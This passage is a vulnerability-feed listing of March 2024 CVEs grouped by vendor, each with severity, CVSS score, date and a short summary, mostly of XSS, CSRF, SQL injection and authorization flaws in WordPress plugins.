CVE-2024-27953 | Medium | 4.7 | - | 2024-03-13 | Missing Authorization vulnerability in Cool Plugins Cryptocurrency Widgets – Price Ticker & Coins List. This issue affects Cryptocurrency Widgets – Price Ticker & Coins List: from n/a through 2.6.8.

Corewcf · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28252 | High | 7.5 | - | 2024-03-15 | CoreWCF is a port of the service side of Windows Communication Foundation (WCF) to .NET Core.

Cozmoslabs · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-51522 | Medium | 4.3 | - | 2024-03-15 | Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Paid Member Subscriptions. This issue affects Paid Member Subscriptions: from n/a through 2.10.4.

Cozyvision · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1489 | Medium | 4.3 | - | 2024-03-13 | The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.9.

Crmperks · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2030 | Medium | 6.4 | - | 2024-03-13 | The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.3 due to insufficient input sanitization an…

David De Boer · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25099 | Medium | 6.5 | - | 2024-03-13 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David de Boer Paytium: Mollie payment forms & donations allows Stored XSS. This issue affects Paytium: Mollie payment forms & donations: f…

Dev.institute · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0687 | Medium | 5.3 | - | 2024-03-13 | The Restrict User Access – Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API.

Devolutions · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2403 | Medium | 5.9 | - | 2024-03-13 | Improper cleanup in temporary file handling component in Devolutions Remote Desktop Manager 2024.1.12 and earlier on Windows allows an attacker that compromised a user endpoint, under specific circumstances, to access sensitive information…

Djangoproject · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27351 | Medium | 5.3 | - | 2024-03-15 | In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-servic…

Doofinder · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25596 | Medium | 5.9 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder for WooCommerce allows Stored XSS. This issue affects Doofinder for WooCommerce: from n/a through 2.1.8.

Droitthemes · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2252 | Medium | 5.4 | - | 2024-03-13 | The Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.1.5 due to insufficien…

Duitku · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0631 | Medium | 5.3 | - | 2024-03-13 | The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.6.

Etoile Web Design · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25597 | High | 7.1 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Etoile Web Design Ultimate Reviews allows Stored XSS. This issue affects Ultimate Reviews: from n/a through 3.2.8.

Eve-ng · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2391 | Low | 2.4 | - | 2024-03-12 | A vulnerability was found in EVE-NG 5.0.1-13 and classified as problematic.

Eyoucms · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-42286 | Critical | 9.8 | - | 2024-03-14 | There is a PHP file inclusion vulnerability in the template configuration of eyoucms v1.6.4, allowing attackers to execute code or system commands through a carefully crafted malicious payload.

Faronics · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1618 | High | 7.8 | - | 2024-03-12 | An unquoted search path vulnerability in Faronics Deep Freeze Server Standard, which affects versions 8.30.020.4627 and earlier.

Fedoraproject · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2400 | High | 8.8 | - | 2024-03-13 | Use after free in Performance Manager in Google Chrome prior to 122.0.6261.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Feedwordpress_project · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0839 | Medium | 5.3 | - | 2024-03-13 | The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key.

Feluelle · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28423 | Critical | 9.8 | - | 2024-03-14 | Airflow-Diagrams v2.1.0 was discovered to contain an arbitrary file upload vulnerability in the unsafe_load function at cli.py.

Flamescorpion · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1843 | Medium | 4.3 | - | 2024-03-13 | The Auto Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the aalAddLink function in all versions up to, and including, 6.4.3.

Fluentforms · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6957 | Medium | 4.9 | - | 2024-03-13 | The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.9 due to insufficient input sanitization and output escaping.

Fluid-cloudnative · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-51699 | Medium | 4.0 | - | 2024-03-15 | Fluid is an open source Kubernetes-native Distributed Dataset Orchestrator and Accelerator for data-intensive applications.

Fmemodules · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28391 | Critical | 9.8 | - | 2024-03-14 | SQL injection vulnerability in FME Modules quickproducttable module for PrestaShop v.1.2.1 and before, allows a remote attacker to escalate privileges and obtain information via the readCsv(), displayAjaxProductChangeAttr, displayAjaxProdu…

Follow-redirects · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28849 | Medium | 6.5 | - | 2024-03-14 | follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects.

Formfacade · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25934 | Medium | 6.5 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormFacade allows Stored XSS. This issue affects FormFacade: from n/a through 1.0.0.

Forwardflip · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1862 | High | 8.1 | - | 2024-03-13 | The WooCommerce Add to Cart Custom Redirect plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wcr_dismiss_admin_notice' function in all versions up to, and in…

Freescout · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28186 | High | 7.1 | - | 2024-03-12 | FreeScout is an open source help desk and shared inbox built with PHP.

Frenify · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0385 | Medium | 4.3 | - | 2024-03-13 | The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4.

Frentix · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28198 | Medium | 4.6 | - | 2024-03-11 | OpenOlat is an open source web-based e-learning platform for teaching, learning, assessment and communication.

Friendlyelec · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2495 | Medium | 5.2 | - | 2024-03-15 | Cryptographic key vulnerability encoded in the FriendlyWrt firmware affecting version 2022-11-16.51b3d35.

Friendsofsymfony1 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28859 | Medium | 5.0 | - | 2024-03-15 | Symfony1 is a community fork of symfony 1.4 with DIC, form enhancements, latest Swiftmailer, better performance, composer compatible and PHP 8 support.

Gacjie · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2406 | Medium | 5.4 | - | 2024-03-12 | A vulnerability, which was classified as critical, was found in Gacjie Server up to 1.0.

Geminilabs · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2293 | Medium | 6.4 | - | 2024-03-13 | The Site Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user display name in all versions up to, and including, 6.11.4 due to insufficient input sanitization and output escaping.

Geovision · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2022-46070 | High | 7.5 | - | 2024-03-11 | GV-ASManager V6.0.1.0 contains a Local File Inclusion vulnerability in GeoWebServer via Path.

Givewp · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27987 | High | 7.1 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP GiveWP. This issue affects GiveWP: from n/a through 3.3.1.

Glpi-project · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27756 | High | 8.8 | - | 2024-03-15 | GLPI through 10.0.12 allows CSV injection by an attacker who is able to create an asset with a crafted title.

Go-vela · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28236 | High | 7.7 | - | 2024-03-12 | Vela is a Pipeline Automation (CI/CD) framework built on Linux container technology written in Golang.

Gonahkar · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6809 | Medium | 6.4 | - | 2024-03-13 | The Custom fields shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user suppli…

Gpriday · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1723 | Medium | 6.4 | - | 2024-03-13 | The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.58.7 due to insufficient input sanitization and output escaping.

Hasthemes · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1176 | Medium | 5.3 | - | 2024-03-13 | The HT Easy GA4 – Google Analytics WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the login() function in all versions up to, and including, 1.1.5.

Heimavista · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2412 | Medium | 5.3 | - | 2024-03-13 | The disabling function of the user registration page for Heimavista Rpage and Epage is not properly implemented, allowing remote attackers to complete user registration on sites where user registration is supposed to be disabled.

Hiroaki Miyashita · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25919 | Medium | 6.5 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS. This issue affects Custom Field Template: from n/a through 2.6.

Hitachi · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6814 | Medium | 5.6 | - | 2024-03-12 | Insertion of Sensitive Information into Log File vulnerability in Hitachi Cosminexus Component Container allows local users to gain sensitive information. This issue affects Cosminexus Component Container: from 11-30 before 11-30-05, from 1…

Hopsoft · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28181 | High | 8.1 | - | 2024-03-14 | turbo_boost-commands is a set of commands to help you build robust reactive applications with Rails & Hotwire.

Hp Inc. · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-5410 | High | 8.2 | - | 2024-03-12 | A potential security vulnerability has been reported in the system BIOS of certain HP PC products, which might allow memory tampering.

I13websolution · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2015-10130 | Medium | 5.3 | - | 2024-03-13 | The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0.

Icopydoc · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1365 | Medium | 6.1 | - | 2024-03-13 | The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the feed_id parameter in all versions up to, and including, 4.2.3 due to insufficient input sanitization and output escaping.

Imdpen · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2031 | Medium | 6.4 | - | 2024-03-12 | The Video Conferencing with Zoom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zoom_recordings_by_meeting' shortcode in all versions up to, and including, 4.4.4 due to insufficient input sanitization a…

Implem Inc. · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-21584 | Medium | 6.1 | - | 2024-03-12 | Pleasanter 1.3.49.0 and earlier contains a cross-site scripting vulnerability.

Intumit · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2413 | Critical | 9.8 | | 2024-03-13 | Intumit SmartRobot uses a fixed encryption key for authentication.

Inunosinsi · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28187 | High | 7.2 | | 2024-03-11 | SOY CMS is an open source CMS (content management system) that allows you to build blogs and online shops.

Jfrog · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2247 | High | 8.8 | | 2024-03-13 | JFrog Artifactory versions below 7.77.7, 7.82.1, are vulnerable to DOM-based cross-site scripting due to improper handling of the import override mechanism.

Jmash · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27196 | High | 7.1 | | 2024-03-15 | Cross Site Scripting (XSS) vulnerability in Joel Starnes postMash – custom post order allows Reflected XSS. This issue affects postMash – custom post order: from n/a through 1.2.0.

Joseph C Dolson · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25916 | Medium | 6.5 | | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joseph C Dolson My Calendar allows Stored XSS. This issue affects My Calendar: from n/a through 3.4.23.

Kadencewp · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1541 | Medium | 6.4 | | 2024-03-13 | The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the htmlTag attribute in all versions up to, and including, 3.2.23 due to insufficient input sanitization…

Kbjohnson90 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6969 | Medium | 4.3 | | 2024-03-13 | The User Shortcodes Plus plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the user_meta shortcode due to missing validation on a user controlled key.

Kirillmakarov · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2365 | Low | 1.6 | | 2024-03-11 | A vulnerability classified as problematic was found in Musicshelf 1.0/1.1 on Android.

Kodezen · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1505 | High | 8.8 | | 2024-03-13 | The Academy LMS – eLearning and online course solution for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.9.19.

Korenix · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2371 | Medium | 6.2 | | 2024-03-12 | Information exposure vulnerability in Korenix JetI/O 6550 affecting firmware version F208 Build:0817.

Leantime · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27703 | Medium | 5.4 | | 2024-03-13 | Cross Site Scripting vulnerability in Leantime 3.0.6 allows a remote attacker to execute arbitrary code via the to-do title parameter.

Linkedin · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28425 | High | 7.5 | | 2024-03-14 | greykite v1.0.0 was discovered to contain an arbitrary file upload vulnerability in the load_obj function at /templates/pickle_utils.py.

Logitech · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2537 | Medium | 4.4 | | 2024-03-15 | Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.

Magesh-k21 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2514 | High | 7.3 | | 2024-03-15 | A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0.

Mainwp · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1642 | Medium | 4.3 | | 2024-03-13 | The MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.0.1.

Mayurik · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2418 | Medium | 6.3 | | 2024-03-13 | A vulnerability was found in SourceCodester Best POS Management System 1.0.

Munyweki · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25854 | Medium | 6.1 | | 2024-03-11 | Cross Site Scripting (XSS) vulnerability in Sourcecodester Insurance Management System 1.0 allows attackers to run arbitrary code via the Subject and Description fields when submitting a support ticket.

Mz-automation · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-26529 | High | 7.5 | | 2024-03-13 | An issue in mz-automation libiec61850 v.1.5.3 and before, allows a remote attacker to cause a denial of service (DoS) via the mmsServer_handleDeleteNamedVariableListRequest function of src/mms/iso_mms/server/mms_named_variable_list_service…

Netweblogic · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0614 | Medium | 4.4 | | 2024-03-13 | The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping.

Newsletter2go · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1328 | Medium | 6.4 | | 2024-03-12 | The Newsletter2Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘style’ parameter in all versions up to, and including, 4.0.14 due to insufficient input sanitization and output escaping.

Nixos · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27297 | Medium | 6.3 | | 2024-03-11 | Nix is a package manager for Linux and other Unix systems.

Omron Corporation · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27121 | High | 7.2 | | 2024-03-12 | Path traversal vulnerability exists in Machine Automation Controller NJ Series and Machine Automation Controller NX Series.

Palantir · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-30968 | Medium | 6.8 | | 2024-03-12 | One of Gotham Gaia services was found to be vulnerable to a stored cross-site scripting (XSS) vulnerability that could have allowed an attacker to bypass CSP and get a persistent cross site scripting payload on the stack.

Pawaryogesh1989 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0369 | Medium | 4.3 | | 2024-03-13 | The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0.

Payu India · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27193 | High | 7.1 | | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PayU India PayU India payu-india allows DOM-Based XSS. This issue affects PayU India: from n/a through <= 3.8.8.

Pega · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-50168 | High | 7.7 | | 2024-03-14 | Pega Platform from 6.x to 8.8.4 is affected by an XXE issue with PDF Generation.

Phlex · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28199 | High | 7.1 | | 2024-03-11 | phlex is an open source framework for building object-oriented views in Ruby.

Pickplugins · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-7072 | High | 7.5 | | 2024-03-12 | The Post Grid Combo – 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.68 via the 'get_posts' REST API Endpoint.

Pinterest · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28251 | Medium | 5.6 | | 2024-03-14 | Querybook is a Big Data Querying UI, combining collocated table metadata and a simple notebook interface.

Plv8 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1713 | High | 7.2 | | 2024-03-14 | A user who can create objects in a database with plv8 3.2.1 installed is able to cause deferred triggers to execute as the Superuser during autovacuum.

Postalserver · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27938 | Medium | 5.3 | | 2024-03-11 | Postal is an open source SMTP server.

Projectdiscovery · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27920 | High | 7.4 | | 2024-03-15 | projectdiscovery/nuclei is a fast and customisable vulnerability scanner based on simple YAML based DSL.

Pterodactyl · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27102 | Critical | 9.9 | | 2024-03-13 | Wings is the server control plane for Pterodactyl Panel.

Rafflepress · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1935 | High | 7.2 | | 2024-03-13 | The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘parent_url’ parameter in all versions up to, and inclu…

Raspap · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2497 | Medium | 4.7 | | 2024-03-15 | A vulnerability was found in RaspAP raspap-webgui 3.0.9 and classified as critical.

Remyandrade · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2393 | Medium | 6.3 | | 2024-03-12 | A vulnerability was found in SourceCodester CRUD without Page Reload 1.0.

Rocklobster · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2242 | Medium | 6.1 | | 2024-03-13 | The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘active-tab’ parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping.

Root3 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27301 | High | 7.3 | | 2024-03-14 | Support App is an opensource application specialized in managing Apple devices.

Sagemcom · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1623 | High | 7.7 | | 2024-03-14 | Insufficient session timeout vulnerability in the FAST3686 V2 Vodafone router from Sagemcom.

Sandisk · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-22167 | High | 7.9 | | 2024-03-13 | A potential DLL hijacking vulnerability in the SanDisk PrivateAccess application for Windows that could lead to arbitrary code execution in the context of the system user.

Santesoft · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1696 | High | 7.8 | | 2024-03-11 | In Santesoft Sante FFT Imaging versions 1.4.1 and prior once a user opens a malicious DCM file on affected FFT Imaging installations, a local attacker could perform an out-of-bounds write, which could allow for arbitrary code execution.

Scott Reilly · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27192 | High | 7.1 | | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Reilly Configure SMTP allows Reflected XSS. This issue affects Configure SMTP: from n/a through 3.1.

Shapedplugin · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1363 | Medium | 6.4 | | 2024-03-13 | The Easy Accordion – Best Accordion FAQ Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'accordion_content_source' attribute in all versions up to, and including, 2.3.4 due to insufficient inp…

Shellcreeper · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0906 | Medium | 5.3 | | 2024-03-12 | The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API.

Simple-membership-plugin · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1985 | Medium | 4.7 | | 2024-03-13 | The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping.

Sirv · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-50898 | Medium | 5.4 | | 2024-03-15 | Missing Authorization vulnerability in sirv.Com Sirv. This issue affects Sirv: from n/a through 7.1.2.

Snowflake · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28851 | Medium | 4.0 | | 2024-03-15 | The Snowflake Hive metastore connector provides an easy way to query Hive-managed data via Snowflake.

Softing · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0860 | High | 8.0 | | 2024-03-14 | The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests.

Soundcloud Inc., Lawrie Malen · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25936 | Medium | 6.5 | | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoundCloud Inc., Lawrie Malen SoundCloud Shortcode allows Stored XSS. This issue affects SoundCloud Shortcode: from n/a through 4.0.1.

Sourcecodester · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2394 | Medium | 4.7 | | 2024-03-12 | A vulnerability was found in SourceCodester Employee Management System 1.0.

Squirrly · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1273 | Medium | 6.1 | | 2024-03-11 | The Starbox WordPress plugin before 3.5.0 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.

Standalonetech · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1690 | Medium | 4.3 | | 2024-03-13 | The TeraWallet – Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the terawallet_export_user_search…

Stimulusreflex · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28121 | High | 8.8 | | 2024-03-12 | stimulus_reflex is a system to extend the capabilities of both Rails and Stimulus by intercepting user interactions and passing them to Rails over real-time websockets.

Storeapps · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-5663 | High | 8.8 | | 2024-03-13 | The News Announcement Scroll plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparat…

Strangerstudios · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1279 | Medium | 4.3 | | 2024-03-11 | The Paid Memberships Pro WordPress plugin before 2.12.9 does not prevent user with at least the contributor role from leaking other users' sensitive metadata.

Strategy11 · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1290 | Medium | 6.5 | | 2024-03-11 | The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take ov…

Stylemix · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2106 | Medium | 5.3 | | 2024-03-13 | The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 3.2.10.

Sysbasics · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-51369 | Medium | 4.3 | | 2024-03-15 | Cross-Site Request Forgery (CSRF) vulnerability in SysBasics Customize My Account for WooCommerce. This issue affects Customize My Account for WooCommerce: from n/a through 1.8.3.

The Libreswan Project (Www.libreswan.org) · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2357 | Medium | 6.5 | | 2024-03-11 | The Libreswan Project was notified of an issue causing libreswan to restart under some IKEv2 retransmit scenarios when a connection is configured to use PreSharedKeys (authby=secret) and the connection cannot find a matching configured sec…

Theme-fusion · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1668 | Medium | 6.5 | | 2024-03-13 | The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 7.11.5 via the form entries page.

Themekraft · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1158 | Medium | 4.3 | | 2024-03-13 | The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buddyfo…

Themencode · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25097 | Medium | 6.5 | | 2024-03-13 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNcode LLC TNC PDF viewer allows Stored XSS. This issue affects TNC PDF viewer: from n/a through 2.8.0.

Themeum · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1751 | High | 8.8 | | 2024-03-13 | The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the question_id parameter in all versions up to, and including, 2.6.1 due to insufficient escaping on the user supplied…

Tmccombs · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28854 | High | 7.5 | | 2024-03-15 | tls-listener is a rust lang wrapper around a connection listener to support TLS.

Tms-outsource · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
